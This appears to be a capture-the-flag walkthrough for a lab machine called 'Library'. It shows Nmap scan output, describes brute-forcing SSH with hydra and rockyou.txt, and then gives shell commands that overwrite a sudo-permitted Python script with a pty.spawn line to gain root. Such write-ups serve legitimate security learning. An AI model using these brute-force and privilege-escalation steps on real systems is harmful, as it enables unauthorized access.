Starting Nmap 7.80 ( <https://nmap.org> ) at 2020-07-04 12:06 EDT
Stats: 0:00:06 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 12:06 (0:00:06 remaining)
Nmap scan report for 10.10.84.240
Host is up (0.045s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
| 256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_ 256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to Blog - Library Machine
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Android 5.1 (92%), Android 7.1.1 - 7.1.2 (92%), Linux 3.13 (92%), Linux 3.2 - 3.10 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 45.22 ms 10.11.0.1
2 45.13 ms 10.10.84.240
So lets go to the page and try to enumerate it and see what information we can get and here we see that there are hints for a username that is meliodas and now that we have that username lets try hydra and bruteforce ssh with rockyou.txt and guess what it worked for us . Lets login to SSH with meliodas credentials and when we do sudo -l we can see that we can run /usr/bin/python * /home/meliodas/bak.py as sudo so what we can do is try to bring tty shell in the python script
$ rm /home/meliodas/bak.py
$ echo 'import pty; pty.spawn("/bin/sh")' > /home/meliodas/bak.py
and then we will have a root shell for us.